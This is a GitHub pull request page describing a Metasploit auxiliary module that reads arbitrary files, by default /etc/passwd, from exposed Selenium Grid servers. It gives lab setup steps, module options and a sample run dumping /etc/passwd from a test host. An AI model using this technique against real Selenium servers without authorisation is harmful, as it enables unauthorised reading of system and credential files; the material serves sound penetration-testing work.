Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Selenium file read auxiliary module #19781

Open
wants to merge 4 commits into
base: master
Choose a base branch
from
Open

Add Selenium file read auxiliary module #19781

wants to merge 4 commits into from

Conversation

Takahiro-Yoko
Copy link
Contributor

One of #19753
Chrome RCE PR: #19769
Firefox RCE PR: #19771

Vulnerable Application

If there is an open selenium web driver, a remote attacker can send requests to the victims browser.
In certain cases this can be used to access to the remote file system.

The vulnerability affects:

* all version of open Selenium Server (Grid)

This module was successfully tested on:

* selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
* selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04

Installation

  1. docker pull selenium/standalone-firefox:3.141.59

  2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/gather/selenium_file_read
  4. Do: run rhost=<rhost>
  5. You should get a file content

Options

SCHEME (Required)

This is the scheme to use. Default is file.

FILEPATH (Required)

This is the file to read. Default is /etc/passwd.

BROWSER (Required)

This is the browser to use. Default is firefox.

Scenarios

selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04

msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4448
[*] Running module against 192.168.56.16
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid version 4.x detected and ready.
[+] /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
seluser:x:1200:1201::/home/seluser:/bin/bash
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin

[*] Auxiliary module execution completed

This was referenced Jan 1, 2025
Open
Open
@Takahiro-Yoko
Improve
11c1b72 
  * add timeout option
  * print session info
  * apply suggestions (rapid7#19769)
@Takahiro-Yoko
Update check
bca9a5f
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@Takahiro-Yoko